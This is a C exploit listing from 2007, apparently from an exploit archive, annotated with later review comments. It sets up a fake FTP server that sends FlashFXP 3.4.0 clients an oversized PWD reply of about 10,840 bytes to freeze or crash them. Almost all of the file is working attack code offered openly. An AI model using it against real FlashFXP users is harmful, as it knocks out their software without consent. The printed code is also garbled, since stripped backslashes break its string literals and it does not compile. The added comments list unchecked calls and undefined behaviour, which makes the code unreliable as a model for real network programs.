# Title : FlashFXP 3.4.0 build 1145 Remote Buffer Overflow DoS Exploit
# Published : 2007-02-06
# Author : Marsu
/***************************************************************************
* FlashFXP V 3.4.0 build 1145 Buffer Overflow DoS *
* *
* *
* There's a strange bug in FlashFXP. *
* When sending a long PWD command with more than 5420 separated by at *
* least one different char, it is possible to make the app unstable. *
* It first freezes for 45 s, consuming 100% of the CPU; then, if the user *
* clicks disconnect and reconnects to the server, it enters an infinite *
* loop trying to push data onto the stack. *
* *
* *
* I admit it is a little bit tricky but maybe someone will find a better *
* way to exploit this vuln. *
* *
* Have Fun! *
* *
* Coded by Marsu <Marsupilamipowa@hotmail.fr> *
***************************************************************************/
#include "winsock2.h"
#include "stdio.h"
#include "stdlib.h"
#include "windows.h"
#pragma comment(lib, "ws2_32.lib")
// Entry point. Acts as a minimal fake FTP server: it listens on TCP port 21,
// accepts one client, answers the USER/PASS/SYST/FEAT/PWD exchange with
// canned replies, and pads the PWD reply out to roughly 10840 bytes. The
// outer loop runs twice (n = 1, 2), i.e. the client is expected to reconnect
// once. argc/argv are unused.
//
// Review notes (as printed, this listing is not compilable):
//  - Backslashes appear to have been stripped during extraction: "...n" in
//    printf() strings, "rn " in the FTP replies, the '//' multi-character
//    constant on the PWD padding loop, and the unbalanced quotes in the
//    "257 "" / ""rn " literals.
//  - No Winsock call is checked except the first send(): socket(), bind(),
//    listen(), accept() and every recv() may fail (e.g. port 21 already in
//    use or not permitted) and execution simply continues.
//  - recvbuff is never NUL-terminated: memset() fills all 1024 bytes with
//    spaces and recv() does not terminate the data, so printf("%s", recvbuff)
//    can read past the end of the array (undefined behavior).
//  - The memcpy() byte counts for the reply strings may not include the
//    terminating NUL, in which case strlen(evilbuff) on the following send()
//    depends on whatever evilbuff already contained.
//  - client=server=NULL stores a null pointer constant into int socket
//    handles; Winsock's convention for a closed SOCKET is INVALID_SOCKET.
int main(int argc, char* argv[])
{
char recvbuff[1024];
char evilbuff[11000];
sockaddr_in sin;
int server,client;
WSADATA wsaData;
WSAStartup(MAKEWORD(1,1), &wsaData);
int n=1;
// Two sessions: the first connection and the reconnect described above.
while (n<=2)
{
server = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
sin.sin_family = PF_INET;
sin.sin_addr.s_addr = htonl(INADDR_ANY);
sin.sin_port = htons( 21 );
// Return value of bind() is ignored; on failure listen()/accept() below
// operate on an unbound socket.
bind(server,(SOCKADDR*)&sin,sizeof(sin));
printf("[*] Listening on port 21...n");
listen(server,5);
printf("[*] Waiting for client ...n");
// Blocks until a client connects; peer address is not recorded.
client=accept(server,NULL,NULL);
printf("[+] Client connectedn");
// Greeting banner. Note evilbuff is otherwise uninitialized at this point.
memcpy(evilbuff,"220 Hello therern ",18);
// Fills the whole receive buffer with spaces — no NUL terminator is written.
memset(recvbuff,' ',1024);
if (send(client,evilbuff,strlen(evilbuff),0)==-1)
{
printf("[-] Error in send!n");
exit(-1);
}
//USER
// Each step below: read whatever the client sent, echo it to stdout, and
// answer with a fixed FTP reply code. recv() length is never used.
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
memcpy(evilbuff,"331 rn ",7);
send(client,evilbuff,strlen(evilbuff),0);
Sleep(50);
//PASS
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
memcpy(evilbuff,"230 rn ",7);
send(client,evilbuff,strlen(evilbuff),0);
//SYST
memset(recvbuff,' ',1024);
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
memcpy(evilbuff,"215 WINDOWSrn ",14);
send(client,evilbuff,strlen(evilbuff),0);
//FEAT
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
memcpy(evilbuff,"211 ENDrn ",10);
send(client,evilbuff,strlen(evilbuff),0);
//PWD
// Build the oversized 257 reply: bytes 5..10840 alternate between 'a' and
// the (garbled) separator character; the reply code is written in front
// and a 4-byte terminator after. All writes stay within evilbuff[11000].
int i=5;
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
while (i<10840) {
memset(evilbuff+i,'a',1);
i++;
memset(evilbuff+i,'//',1);
i++;
}
memcpy(evilbuff,"257 "",5);
memcpy(evilbuff+10840,""rn ",4);
send(client,evilbuff,strlen(evilbuff),0);
// Tear down both sockets so the next loop iteration can rebind port 21.
closesocket(client);
closesocket(server);
client=server=NULL;
if (n<2) {
printf("[+] Now FlashFXP is out for 45sec.n");
printf("[+] Note that user MUST click on disconnect and then reconnectn
to trigger the bug.nn");
}
n++;
}
// Short grace period before exiting; no error status is ever returned.
Sleep(2000);
printf("n[+] FlashFXP must be DoSedn");
return 0;
}